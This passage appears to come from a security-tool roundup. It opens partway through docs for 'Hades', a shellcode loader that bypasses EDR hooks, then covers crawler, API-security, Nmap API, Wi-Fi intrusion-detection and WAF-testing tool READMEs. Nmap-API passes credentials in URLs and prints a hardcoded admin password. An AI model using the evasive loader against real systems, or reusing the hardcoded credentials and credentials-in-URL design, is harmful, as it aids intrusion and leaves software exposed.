    -f, --file <str> shellcode file path (.bin)
    -t, --technique <str> injection technique [selfthread, remotethread, queueuserapc]

    Example:

Inject shellcode that spawns calc.exe with the queueuserapc technique:

    .\hades.exe -f calc.bin -t queueuserapc

    Showcase

    User-mode hooking bypass with syscall RVA sorting (NtQueueApcThread hooked with frida-trace and custom handler)

    Instrumentation callback bypass with indirect syscalls (injected DLL is from syscall-detect by jackullrich)

    Additional Notes

    Direct syscall version

In the latest release, direct syscall capabilities have been replaced by indirect syscalls provided by acheron. If for some reason you want to use the previous version of the loader that used direct syscalls, you need to explicitly pass the direct_syscalls tag to the compiler, which will figure out which files need to be included in or excluded from the build.

    GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" -tags='direct_syscalls' -o dist/hades_directsys.exe cmd/hades/main.go

    Disclaimers

    Warning
This project has been created for educational purposes only, to experiment with malware dev in Go and to learn more about the unsafe package and the weird Go Assembly syntax. Don't use it on systems you don't own. The developer of this project is not responsible for any damage caused by the improper use of this tool.

    Credits

    Shoutout to the following people that shared their knowledge and code that inspired this tool:

    License

    This project is licensed under the GPLv3 License - see the LICENSE file for details



SpiderSuite - Advanced Web Spider/Crawler For Cyber Security Professionals

    By: Zion3R


An advanced cross-platform and multi-feature GUI web spider/crawler for cyber security professionals. SpiderSuite can be used for attack surface mapping and analysis. For more information visit SpiderSuite's website.


    Installation and Usage

SpiderSuite is designed for easy installation and usage, even for first-timers.

    • First, download the package of your choice.

    • Then install the downloaded SpiderSuite package.

• See the First time crawling with SpiderSuite article for a tutorial on how to get started.

For complete documentation of SpiderSuite, see the wiki.

    Contributing

    Can you translate?

    Visit SpiderSuite's translation project to make translations to your native language.

    Not a developer?

    You can help by reporting bugs, requesting new features, improving the documentation, sponsoring the project & writing articles.

    For More information see contribution guide.

Contributors

    Credits

    This product includes software developed by the following open source projects:



    Metlo - An Open-Source API Security Platform

    By: Zion3R

    Secure Your API.


    Metlo is an open-source API security platform

    With Metlo you can:

    • Create an Inventory of all your API Endpoints and Sensitive Data.
    • Detect common API vulnerabilities.
    • Proactively test your APIs before they go into production.
    • Detect API attacks in real time.

    Metlo does this by scanning your API traffic using one of our connectors and then analyzing trace data.


    There are three ways to get started with Metlo. Metlo Cloud, Metlo Self Hosted, and our Open Source product. We recommend Metlo Cloud for almost all users as it scales to 100s of millions of requests per month and all upgrades and migrations are managed for you.

You can get started with Metlo Cloud right away without a credit card. Just make an account on https://app.metlo.com and follow the instructions in our docs here.

Although we highly recommend Metlo Cloud, if you're a large company or need an air-gapped system you can self-host Metlo as well! Create an account on https://my.metlo.com and follow the instructions in our docs here to set up Metlo in your own cloud environment.

    If you want to deploy our Open Source product we have instructions for AWS, GCP, Azure and Docker.

    You can also join our Discord community if you need help or just want to chat!

    Features

    • Endpoint Discovery - Metlo scans network traffic and creates an inventory of every single endpoint in your API.
• Sensitive Data Scanning - Each endpoint is scanned for PII data and given a risk score.
• Vulnerability Discovery - Get alerts for issues like unauthenticated endpoints returning sensitive data, no HSTS headers, PII data in URL params, Open API spec diffs, and more.
    • API Security Testing - Build security tests directly in Metlo. Autogenerate tests for OWASP Top 10 vulns like BOLA, Broken Authentication, SQL Injection and more.
    • CI/CD Integration - Integrate with your CI/CD to find issues in development and staging.
    • Attack Detection - Our ML Algorithms build a model for baseline API behavior. Any deviation from this baseline is surfaced to your security team as soon as possible.
    • Attack Context - Metlo’s UI gives you full context around any attack to help quickly fix the vulnerability.

    Testing

For tests that we can't autogenerate, our built-in testing framework helps you get to 100% security coverage on your highest-risk APIs. You can build tests in a YAML format to make sure your API is working as intended.

For example, the following test checks for broken authentication:

id: test-payment-processor-metlo.com-user-billing

meta:
  name: test-payment-processor.metlo.com/user/billing Test Auth
  severity: CRITICAL
  tags:
    - BROKEN_AUTHENTICATION

test:
  - request:
      method: POST
      url: https://test-payment-processor.metlo.com/user/billing
      headers:
        - name: Content-Type
          value: application/json
        - name: Authorization
          value: ...
      data: |-
        { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
    assert:
      - key: resp.status
        value: 200
  - request:
      method: POST
      url: https://test-payment-processor.metlo.com/user/billing
      headers:
        - name: Content-Type
          value: application/json
      data: |-
        { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
    assert:
      - key: resp.status
        value: [ 401, 403 ]

    You can see more information on our docs.

    Why Metlo?

Most businesses have adopted public-facing APIs to power their websites and apps. This has dramatically increased the attack surface for your business. There's been a 200% increase in API security breaches in just the last year, with the APIs of companies like Uber, Meta, Experian and Just Dial leaking millions of records. It's obvious that tools are needed to help security teams make APIs more secure, but there's no great solution on the market.

Some solutions require you to go through sales calls just to try the product, while others require you to send all your API traffic to their own cloud. Metlo is the first open-source API security platform that you can self-host, and you can get started for free right away!

    We're Hiring!

    We would love for you to come help us make Metlo better. Come join us at Metlo!

    Open-source vs. paid

    This repo is entirely MIT licensed. Features like user management, user roles and attack protection require an enterprise license. Contact us for more information.

    Development

Check out our development guide for more info on how to develop Metlo locally.



    Katana - A Next-Generation Crawling And Spidering Framework


    A next-generation crawling and spidering framework


    Features

    • Fast And fully configurable web crawling
    • Standard and Headless mode support
    • JavaScript parsing / crawling
    • Customizable automatic form filling
    • Scope control - Preconfigured field / Regex
    • Customizable output - Preconfigured fields
    • INPUT - STDIN, URL and LIST
    • OUTPUT - STDOUT, FILE and JSON

    Installation

katana requires Go 1.18 to install successfully. To install, just run the below command or download a pre-compiled binary from the release page.

    go install github.com/projectdiscovery/katana/cmd/katana@latest

    Usage

    katana -h

    This will display help for the tool. Here are all the switches it supports.

    Usage:
    ./katana [flags]

    Flags:
    INPUT:
    -u, -list string[] target url / list to crawl

    CONFIGURATION:
    -d, -depth int maximum depth to crawl (default 2)
    -jc, -js-crawl enable endpoint parsing / crawling in javascript file
    -ct, -crawl-duration int maximum duration to crawl the target for
    -kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
    -mrs, -max-response-size int maximum response size to read (default 2097152)
    -timeout int time to wait for request in seconds (default 10)
    -aff, -automatic-form-fill enable optional automatic form filling (experimental)
    -retry int number of times to retry the request (default 1)
    -proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in request
    -config string path to the katana configuration file
    -fc, -form-config string path to custom form configuration file

    DEBUG:
    -health-check, -hc run diagnostic check up
    -elog, -error-log string file to write sent requests error log

    HEADLESS:
    -hl, -headless enable headless hybrid crawling (experimental)
    -sc, -system-chrome use local installed chrome browser instead of katana installed
    -sb, -show-browser show the browser on the screen with headless mode
    -ho, -headless-options string[] start headless chrome with additional options
    -nos, -no-sandbox start headless chrome in --no-sandbox mode
    -scp, -system-chrome-path string use specified chrome binary path for headless crawling
    -noi, -no-incognito start headless chrome without incognito mode

    SCOPE:
    -cs, -crawl-scope string[] in scope url regex to be followed by crawler
    -cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
    -fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
    -ns, -no-scope disables host based default scope
    -do, -display-out-scope display external endpoint from scoped crawling

    FILTER:
    -f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
    -sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
    -em, -extension-match string[] match output for given extension (eg, -em php,html,js)
    -ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)

    RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
    -p, -parallelism int number of concurrent inputs to process (default 10)
    -rd, -delay int request delay between each request in seconds
    -rl, -rate-limit int maximum requests to send per second (default 150)
    -rlm, -rate-limit-minute int maximum number of requests to send per minute

    OUTPUT:
    -o, -output string file to write output to
    -j, -json write output in JSONL(ines) format
    -nc, -no-color disable output content coloring (ANSI escape codes)
    -silent display output only
    -v, -verbose display verbose output
    -version display project version

    Running Katana

    Input for katana

katana requires a URL or endpoint to crawl and accepts single or multiple inputs.

An input URL can be provided using the -u option, and multiple values can be provided using comma-separated input; similarly, file input is supported using the -list option, and piped input (stdin) is also supported.

    URL Input

    katana -u https://tesla.com

    Multiple URL Input (comma-separated)

    katana -u https://tesla.com,https://google.com

    List Input

    $ cat url_list.txt

    https://tesla.com
    https://google.com
    katana -list url_list.txt

    STDIN (piped) Input

    echo https://tesla.com | katana
    cat domains | httpx | katana

    Example running katana -

    katana -u https://youtube.com

    __ __
    / /_____ _/ /____ ____ ___ _
    / '_/ _ / __/ _ / _ \/ _ /
    /_/\_\\_,_/\__/\_,_/_//_/\_,_/ v0.0.1

    projectdiscovery.io

    [WRN] Use with caution. You are responsible for your actions.
    [WRN] Developers assume no liability and are not responsible for any misuse or damage.
    https://www.youtube.com/
    https://www.youtube.com/about/
    https://www.youtube.com/about/press/
    https://www.youtube.com/about/copyright/
    https://www.youtube.com/t/contact_us/
    https://www.youtube.com/creators/
    https://www.youtube.com/ads/
    https://www.youtube.com/t/terms
    https://www.youtube.com/t/privacy
    https://www.youtube.com/about/policies/
https://www.youtube.com/howyoutubeworks?utm_campaign=ytgen&utm_source=ythp&utm_medium=LeftNav&utm_content=txt&u=https%3A%2F%2Fwww.youtube.com%2Fhowyoutubeworks%3Futm_source%3Dythp%26utm_medium%3DLeftNav%26utm_campaign%3Dytgen
    https://www.youtube.com/new
    https://m.youtube.com/
    https://www.youtube.com/s/desktop/4965577f/jsbin/desktop_polymer.vflset/desktop_polymer.js
    https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-home-page-skeleton.css
    https://www.youtube.com/s/desktop/4965577f/cssbin/www-onepick.css
    https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.0Zo5FUcPkCg.L.B1.O/am=gAE/d=0/rs=AGKMywG5nh5Qp-BGPbOaI1evhF5BVGRZGA
    https://www.youtube.com/opensearch?locale=en_GB
    https://www.youtube.com/manifest.webmanifest
    https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-watch-page-skeleton.css
    https://www.youtube.com/s/desktop/4965577f/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js
https://www.youtube.com/s/desktop/4965577f/jsbin/webcomponents-sd.vflset/webcomponents-sd.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/scheduler.vflset/scheduler.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/www-i18n-constants-en_GB.vflset/www-i18n-constants.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/www-tampering.vflset/www-tampering.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/spf.vflset/spf.js
    https://www.youtube.com/s/desktop/4965577f/jsbin/network.vflset/network.js
    https://www.youtube.com/howyoutubeworks/
    https://www.youtube.com/trends/
    https://www.youtube.com/jobs/
    https://www.youtube.com/kids/

    Crawling Mode

    Standard Mode

Standard crawling mode uses the standard Go http library under the hood to handle HTTP requests/responses. This mode is much faster as it doesn't have the browser overhead. Still, it analyzes the HTTP response body as-is, without any JavaScript or DOM rendering, potentially missing post-DOM-rendered endpoints or asynchronous endpoint calls that happen in complex web applications depending, for example, on browser-specific events.

    Headless Mode

Headless mode hooks internal headless calls to handle HTTP requests/responses directly within the browser context. This offers two advantages:

• The HTTP fingerprint (TLS and user agent) fully identifies the client as a legitimate browser
• Better coverage, since endpoints are discovered by analyzing both the standard raw response, as in the previous mode, and the browser-rendered one with JavaScript enabled.

Headless crawling is optional and can be enabled using the -headless option.

    Here are other headless CLI options -

    katana -h headless

    Flags:
    HEADLESS:
    -hl, -headless enable experimental headless hybrid crawling
    -sc, -system-chrome use local installed chrome browser instead of katana installed
    -sb, -show-browser show the browser on the screen with headless mode
    -ho, -headless-options string[] start headless chrome with additional options
    -nos, -no-sandbox start headless chrome in --no-sandbox mode
    -noi, -no-incognito start headless chrome without incognito mode

    -no-sandbox

    Runs headless chrome browser with no-sandbox option, useful when running as root user.

    katana -u https://tesla.com -headless -no-sandbox

    -no-incognito

    Runs headless chrome browser without incognito mode, useful when using the local browser.

    katana -u https://tesla.com -headless -no-incognito

    -headless-options

    When crawling in headless mode, additional chrome options can be specified using -headless-options, for example -

    katana -u https://tesla.com -headless -system-chrome -headless-options --disable-gpu,proxy-server=http://127.0.0.1:8080

    Scope Control

Crawling can be endless if not scoped; as such, katana comes with multiple options to define the crawl scope.

    -field-scope

The handiest option for defining scope is the predefined field name, with rdn being the default option for field scope.

    • rdn - crawling scoped to root domain name and all subdomains (e.g. *example.com) (default)
    • fqdn - crawling scoped to given sub(domain) (e.g. www.example.com or api.example.com)
    • dn - crawling scoped to domain name keyword (e.g. example)
    katana -u https://tesla.com -fs dn

    -crawl-scope

For advanced scope control, the -cs option can be used, which comes with regex support.

    katana -u https://tesla.com -cs login

For multiple in-scope rules, a file input with multiline strings/regexes can be passed.

    $ cat in_scope.txt

    login/
    admin/
    app/
    wordpress/
    katana -u https://tesla.com -cs in_scope.txt

    -crawl-out-scope

For defining what not to crawl, the -cos option can be used, which also supports regex input.

    katana -u https://tesla.com -cos logout

For multiple out-of-scope rules, a file input with multiline strings/regexes can be passed.

    $ cat out_of_scope.txt

    /logout
    /log_out
    katana -u https://tesla.com -cos out_of_scope.txt

    -no-scope

Katana defaults to scoping *.domain; to disable this, the -ns option can be used, for example to crawl the whole internet.

    katana -u https://tesla.com -ns

    -display-out-scope

By default, when a scope option is used, it also applies to the links displayed as output, so external URLs are excluded. To overwrite this behavior, the -do option can be used to display all the external URLs found while crawling the scoped URL/endpoint.

    katana -u https://tesla.com -do

Here are all the CLI options for scope control -

    katana -h scope

    Flags:
    SCOPE:
    -cs, -crawl-scope string[] in scope url regex to be followed by crawler
    -cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
    -fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
    -ns, -no-scope disables host based default scope
    -do, -display-out-scope display external endpoint from scoped crawling

    Crawler Configuration

Katana comes with multiple options to configure and control the crawl the way we want.

    -depth

Option to define the depth to which URLs are followed while crawling; the greater the depth, the more endpoints crawled and the longer the crawl takes.

    katana -u https://tesla.com -d 5

    -js-crawl

Option to enable JavaScript file parsing and crawling of the endpoints discovered in JavaScript files; disabled by default.

    katana -u https://tesla.com -jc

    -crawl-duration

Option to predefine the crawl duration; disabled by default.

    katana -u https://tesla.com -ct 2

    -known-files

Option to enable crawling of the robots.txt and sitemap.xml files; disabled by default.

    katana -u https://tesla.com -kf robotstxt,sitemapxml

    -automatic-form-fill

Option to enable automatic form filling for known/unknown fields; known field values can be customized as needed by updating the form config file at $HOME/.config/katana/form-config.yaml.

Automatic form filling is an experimental feature.

       -aff, -automatic-form-fill  enable optional automatic form filling (experimental)

There are more options to configure when needed; here are all the config-related CLI options -

    katana -h config

    Flags:
    CONFIGURATION:
    -d, -depth int maximum depth to crawl (default 2)
    -jc, -js-crawl enable endpoint parsing / crawling in javascript file
    -ct, -crawl-duration int maximum duration to crawl the target for
    -kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
    -mrs, -max-response-size int maximum response size to read (default 2097152)
    -timeout int time to wait for request in seconds (default 10)
    -retry int number of times to retry the request (default 1)
    -proxy string http/socks5 proxy to use
    -H, -headers string[] custom header/cookie to include in request
    -config string path to the katana configuration file
    -fc, -form-config string path to custom form configuration file

    Filters

    -field

Katana comes with built-in fields that can be used to filter the output for the desired information; the -f option can be used to specify any of the available fields.

       -f, -field string  field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)

    Here is a table with examples of each field and expected output when used -

    FIELD DESCRIPTION EXAMPLE
    url URL Endpoint https://admin.projectdiscovery.io/admin/login?user=admin&password=admin
    qurl URL including query param https://admin.projectdiscovery.io/admin/login.php?user=admin&password=admin
    qpath Path including query param /login?user=admin&password=admin
    path URL Path https://admin.projectdiscovery.io/admin/login
    fqdn Fully Qualified Domain name admin.projectdiscovery.io
    rdn Root Domain name projectdiscovery.io
    rurl Root URL https://admin.projectdiscovery.io
    file Filename in URL login.php
    key Parameter keys in URL user,password
    value Parameter values in URL admin,admin
    kv Keys=Values in URL user=admin&password=admin
    dir URL Directory name /admin/
    udir URL with Directory https://admin.projectdiscovery.io/admin/

Here is an example of using the field option to display only the URLs with query parameters -

    katana -u https://tesla.com -f qurl -silent

    https://shop.tesla.com/en_au?redirect=no
    https://shop.tesla.com/en_nz?redirect=no
    https://shop.tesla.com/product/men_s-raven-lightweight-zip-up-bomber-jacket?sku=1740250-00-A
    https://shop.tesla.com/product/tesla-shop-gift-card?sku=1767247-00-A
    https://shop.tesla.com/product/men_s-chill-crew-neck-sweatshirt?sku=1740176-00-A
    https://www.tesla.com/about?redirect=no
    https://www.tesla.com/about/legal?redirect=no
    https://www.tesla.com/findus/list?redirect=no

    Custom Fields

You can create custom fields to extract and store specific information from page responses using regex rules. These custom fields are defined using a YAML config file and are loaded from the default location at $HOME/.config/katana/field-config.yaml. Alternatively, you can use the -flc option to load a custom field config file from a different location. Here is an example custom field:

- name: email
  type: regex
  regex:
    - '([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
    - '([a-zA-Z0-9+._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'

- name: phone
  type: regex
  regex:
    - '\d{3}-\d{8}|\d{4}-\d{7}'

When defining custom fields, the following attributes are supported:

    • name (required)

The value of the name attribute is used as the -field CLI option value.

    • type (required)

The type of the custom attribute; the currently supported option is regex.

    • part (optional)

    The part of the response to extract the information from. The default value is response, which includes both the header and body. Other possible values are header and body.

    • group (optional)

    You can use this attribute to select a specific matched group in regex, for example: group: 1

    Running katana using custom field:

    katana -u https://tesla.com -f email,phone

    -store-field

To complement the field option, which is useful for filtering output at run time, there is the -sf, -store-field option. It works exactly like the field option except that, instead of filtering, it stores all the information on disk under the katana_field directory, sorted by target URL.

    katana -u https://tesla.com -sf key,fqdn,qurl -silent
    $ ls katana_field/

    https_www.tesla.com_fqdn.txt
    https_www.tesla.com_key.txt
    https_www.tesla.com_qurl.txt

The -store-field option can be useful for collecting information to build a targeted wordlist (see the sketch after this list) for various purposes, including but not limited to:

    • Identifying the most commonly used parameters
    • Discovering frequently used paths
    • Finding commonly used files
    • Identifying related or unknown subdomains
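As a rough illustration, here is a minimal Python sketch, assuming the per-host files shown above under katana_field/, that merges every stored field value into a single deduplicated wordlist (wordlist.txt is just a placeholder output name):

    import glob

    # Collect every value written by `katana -sf ...` under katana_field/
    entries = set()
    for path in glob.glob("katana_field/*.txt"):
        with open(path, encoding="utf-8") as f:
            entries.update(line.strip() for line in f if line.strip())

    # Write a deduplicated, sorted wordlist (output name is a placeholder)
    with open("wordlist.txt", "w", encoding="utf-8") as out:
        out.write("\n".join(sorted(entries)))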

    -extension-match

Crawl output can be easily matched for specific extensions using the -em option, which ensures that only output containing the given extensions is displayed.

    katana -u https://tesla.com -silent -em js,jsp,json

    -extension-filter

Crawl output can be easily filtered for specific extensions using the -ef option, which removes all URLs containing the given extensions.

    katana -u https://tesla.com -silent -ef css,txt,md

    Here are additional filter options -

   -f, -field string                field to display in output (url,path,fqdn,rdn,rurl,qurl,file,key,value,kv,dir,udir)
   -sf, -store-field string         field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,file,key,value,kv,dir,udir)
   -em, -extension-match string[]   match output for given extension (eg, -em php,html,js)
   -ef, -extension-filter string[]  filter output for given extension (eg, -ef png,css)

    Rate Limit

It's easy to get blocked / banned while crawling if you don't respect the target website's limits; katana comes with multiple options to tune the crawl to go as fast or as slow as we want.

    -delay

Option to introduce a delay in seconds between each new request katana makes while crawling; disabled by default.

    katana -u https://tesla.com -delay 20

    -concurrency

Option to control the number of URLs per target to fetch at the same time.

    katana -u https://tesla.com -c 20

    -parallelism

Option to define the number of targets to process at the same time from list input.

    katana -u https://tesla.com -p 20

    -rate-limit

Option to define the maximum number of requests that can go out per second.

    katana -u https://tesla.com -rl 100

    -rate-limit-minute

Option to define the maximum number of requests that can go out per minute.

    katana -u https://tesla.com -rlm 500

Here are all the long / short CLI options for rate-limit control -

    katana -h rate-limit

Flags:
RATE-LIMIT:
   -c, -concurrency int          number of concurrent fetchers to use (default 10)
   -p, -parallelism int          number of concurrent inputs to process (default 10)
   -rd, -delay int               request delay between each request in seconds
   -rl, -rate-limit int          maximum requests to send per second (default 150)
   -rlm, -rate-limit-minute int  maximum number of requests to send per minute

    Output

Katana supports file output in both plain text and JSON format; the JSON output includes additional information such as the source, tag, and attribute name to correlate the discovered endpoint.

    -output

    By default, katana outputs the crawled endpoints in plain text format. The results can be written to a file by using the -output option.

    katana -u https://example.com -no-scope -output example_endpoints.txt

    -json

    katana -u https://example.com -json -do | jq .
    {
      "timestamp": "2022-11-05T22:33:27.745815+05:30",
      "endpoint": "https://www.iana.org/domains/example",
      "source": "https://example.com",
      "tag": "a",
      "attribute": "href"
    }
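
Because each line is a standalone JSON object (JSONL), the output is easy to post-process. Here is a minimal Python sketch, assuming the output was saved to a file named results.jsonl (a placeholder, e.g. via -o results.jsonl), that groups the discovered endpoints by the page they were found on:

    import json
    from collections import defaultdict

    # Group endpoints by the page they were discovered on
    by_source = defaultdict(list)
    with open("results.jsonl", encoding="utf-8") as f:
        for line in f:
            record = json.loads(line)
            by_source[record["source"]].append(record["endpoint"])

    for source, endpoints in by_source.items():
        print(source, "->", len(endpoints), "endpoints")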

    -store-response

    The -store-response option allows for writing all crawled endpoint requests and responses to a text file. When this option is used, text files including the request and response will be written to the katana_response directory. If you would like to specify a custom directory, you can use the -store-response-dir option.

    katana -u https://example.com -no-scope -store-response
    $ cat katana_response/index.txt

    katana_response/example.com/327c3fda87ce286848a574982ddd0b7c7487f816.txt https://example.com (200 OK)
    katana_response/www.iana.org/bfc096e6dd93b993ca8918bf4c08fdc707a70723.txt http://www.iana.org/domains/reserved (200 OK)

    Note:

The -store-response option is not supported in -headless mode.

    Here are additional CLI options related to output -

    katana -h output

OUTPUT:
   -o, -output string                file to write output to
   -sr, -store-response              store http requests/responses
   -srd, -store-response-dir string  store http requests/responses to custom directory
   -j, -json                         write output in JSONL(ines) format
   -nc, -no-color                    disable output content coloring (ANSI escape codes)
   -silent                           display output only
   -v, -verbose                      display verbose output
   -version                          display project version


    Nmap-API - Uses Python3.10, Debian, python-Nmap, And Flask Framework To Create A Nmap API That Can Do Scans With A Good Speed Online And Is Easy To Deploy


    Uses python3.10, Debian, python-Nmap, and flask framework to create a Nmap API that can do scans with a good speed online and is easy to deploy.

This is an implementation for our college PCL project, which is still under development and constantly being updated.


    API Reference

    Get all items

  GET /api/p1/{username}:{password}/{target}
  GET /api/p2/{username}:{password}/{target}
  GET /api/p3/{username}:{password}/{target}
  GET /api/p4/{username}:{password}/{target}
  GET /api/p5/{username}:{password}/{target}

Parameter  Type    Description
username   string  Required. Username of the current user
password   string  Required. Current user's password
target     string  Required. The target hostname or IP

    Get item

  GET /api/p1/
  GET /api/p2/
  GET /api/p3/
  GET /api/p4/
  GET /api/p5/

Parameter  Return data  Description            Nmap Command
p1         json         Effective Scan         -Pn -sV -T4 -O -F
p2         json         Simple Scan            -Pn -T4 -A -v
p3         json         Low Power Scan         -Pn -sS -sU -T4 -A -v
p4         json         Partial Intense Scan   -Pn -p- -T4 -A -v
p5         json         Complete Intense Scan  -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln
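
For illustration, a scan can be triggered with a few lines of Python. This is a sketch, not part of the project: the base URL http://localhost:5000 is an assumed Flask host/port, and the credentials and target are placeholders.

    import requests

    BASE = "http://localhost:5000"       # assumed host/port of the deployed Flask app
    USER, PASSWORD = "user", "password"  # placeholder credentials
    TARGET = "scanme.nmap.org"           # example target

    # Run the "Effective Scan" profile (p1); intense profiles can take a while
    resp = requests.get(f"{BASE}/api/p1/{USER}:{PASSWORD}/{TARGET}", timeout=600)
    print(resp.json())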

    Auth and User management

  POST /adduser/{admin-username}:{admin-passwd}/{id}/{username}/{passwd}
  POST /deluser/{admin-username}:{admin-passwd}/{t-username}/{t-userpass}
  POST /altusername/{admin-username}:{admin-passwd}/{t-user-id}/{new-t-username}
  POST /altuserid/{admin-username}:{admin-passwd}/{new-t-user-id}/{t-username}
  POST /altpassword/{admin-username}:{admin-passwd}/{t-username}/{new-t-userpass}

• Make sure you use the admin credentials mentioned below

Parameter       Type    Description
admin-username  string  Admin username
admin-passwd    string  Admin password
id              string  ID for the newly added user
username        string  Username of the newly added user
passwd          string  Password of the newly added user
t-username      string  Target username
t-user-id       string  Target user ID
t-userpass      string  Target user's password
new-t-username  string  New username for the target
new-t-user-id   string  New user ID for the target
new-t-userpass  string  New password for the target

    DEFAULT CREDENTIALS

    ADMINISTRATOR : zAp6_oO~t428)@,



    Pinacolada - Wireless Intrusion Detection System For Hak5's WiFi Coconut


    Pinacolada looks for typical IEEE 802.11 attacks and then informs you about them as quickly as possible. All this with the help of Hak5's WiFi Coconut, which allows it to listen for threats on all 14 channels in the 2.4GHz range simultaneously.


    Supported 802.11 Attacks

Attack            Type
Deauthentication  DoS
Disassociation    DoS
Authentication    DoS
EvilTwin          MiTM
KARMA             MiTM

    Dependencies

    MacOS (With PIP/Python and Homebrew package manager)

    pip install flask
    brew install wireshark

    Linux (With PIP/Python and APT package manager)

    pip install flask
    apt install tshark

For both operating systems, install the WiFi Coconut's userspace software.

    Installation

    # Download Pinacolada
    git clone https://github.com/90N45-d3v/Pinacolada
    cd Pinacolada

    # Start Pinacolada
    python main.py

    Usage

    Pinacolada will be accessible from your browser at 127.0.0.1:8888.
    The default password is CoconutsAreYummy.
After you have logged in, you will see a dashboard on the start page; you should change the password in the settings tab.

    E-Mail Notifications

If configured, Pinacolada will alert you to attacks via e-mail. In order to send you an e-mail, however, an e-mail account for Pinacolada must be specified in the settings tab. To find the necessary information, such as the SMTP server and SMTP port, search the internet for your mail provider and how its SMTP servers are configured and used. Here is some information about well-known providers:

Provider  SMTP Server               SMTP Port (TLS)
Gmail     smtp.gmail.com            587
Outlook   smtp.office365.com        587
GoDaddy   smtpout.secureserver.net  587
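
For reference, sending such a TLS-secured alert mail from Python's standard smtplib looks roughly like this. This is a generic sketch, not Pinacolada's actual code; the account details are placeholders to be replaced with your provider's values from the table above:

    import smtplib
    from email.message import EmailMessage

    SMTP_SERVER, SMTP_PORT = "smtp.gmail.com", 587         # from the table above
    SENDER, APP_PASSWORD = "alerts@example.com", "secret"  # placeholder account

    msg = EmailMessage()
    msg["From"] = SENDER
    msg["To"] = "you@example.com"
    msg["Subject"] = "Pinacolada alert: deauthentication attack detected"
    msg.set_content("A deauthentication DoS was observed on the 2.4GHz band.")

    with smtplib.SMTP(SMTP_SERVER, SMTP_PORT) as server:
        server.starttls()  # upgrade the connection to TLS (port 587)
        server.login(SENDER, APP_PASSWORD)
        server.send_message(msg)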

Not fully tested!

Since I don't own a WiFi Coconut myself, I had to simulate its traffic. So if you encounter any problems, don't hesitate to contact me and open an issue.



    Waf-Bypass - Check Your WAF Before An Attacker Does


WAF Bypass Tool is an open-source tool to analyze the security of any WAF for false positives and false negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by the Nemesida WAF team with the participation of the community.


    How to run

It is forbidden to use this tool for illegal purposes. Don't break the law. We are not responsible for possible risks associated with the use of this software.

    Run from Docker

The latest waf-bypass is always available via Docker Hub. It can easily be pulled with the following commands:

    # docker pull nemesida/waf-bypass
    # docker run nemesida/waf-bypass --host='example.com'

    Run source code from GitHub

    # git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
    # python3 -m pip install -r /opt/waf-bypass/requirements.txt
    # python3 /opt/waf-bypass/main.py --host='example.com'

    Options

• '--proxy' (--proxy='http://proxy.example.com:3128') - specify a proxy to connect through instead of connecting to the host directly.

• '--header' (--header 'Authorization: Basic YWRtaW46YWRtaW4=' --header 'X-TOKEN: ABCDEF') - specify an HTTP header to send with all requests (e.g. for authentication). Multiple use is allowed.

• '--user-agent' (--user-agent 'MyUserAgent 1/1') - specify the HTTP User-Agent to send with all requests, except when the User-Agent is set by the payload ("USER-AGENT").

• '--block-code' (--block-code='403' --block-code='222') - specify the HTTP status code to expect when the WAF blocks a request (default is 403). Multiple use is allowed.

• '--threads' (--threads=15) - specify the number of parallel scan threads (default is 10).

• '--timeout' (--timeout=10) - specify a request processing timeout in seconds (default is 30).

• '--json-format' - display the results in JSON format (useful for integrating the tool with security platforms).

• '--details' - display the False Positive and False Negative payloads. Not available in JSON format.

• '--exclude-dir' - exclude a payload directory (--exclude-dir='SQLi' --exclude-dir='XSS'). Multiple use is allowed.

    Payloads

    Depending on the purpose, payloads are located in the appropriate folders:

    • FP - False Positive payloads
    • API - API testing payloads
    • CM - Custom HTTP Method payloads
    • GraphQL - GraphQL testing payloads
    • LDAP - LDAP Injection etc. payloads
    • LFI - Local File Include payloads
    • MFD - multipart/form-data payloads
    • NoSQLi - NoSQL injection payloads
    • OR - Open Redirect payloads
    • RCE - Remote Code Execution payloads
    • RFI - Remote File Inclusion payloads
    • SQLi - SQL injection payloads
    • SSI - Server-Side Includes payloads
    • SSRF - Server-side request forgery payloads
    • SSTI - Server-Side Template Injection payloads
    • UWA - Unwanted Access payloads
    • XSS - Cross-Site Scripting payloads

    Write your own payloads

    When compiling a payload, the following zones, method and options are used:

    • URL - request's path
    • ARGS - request's query
    • BODY - request's body
    • COOKIE - request's cookie
    • USER-AGENT - request's user-agent
    • REFERER - request's referer
    • HEADER - request's header
    • METHOD - request's method
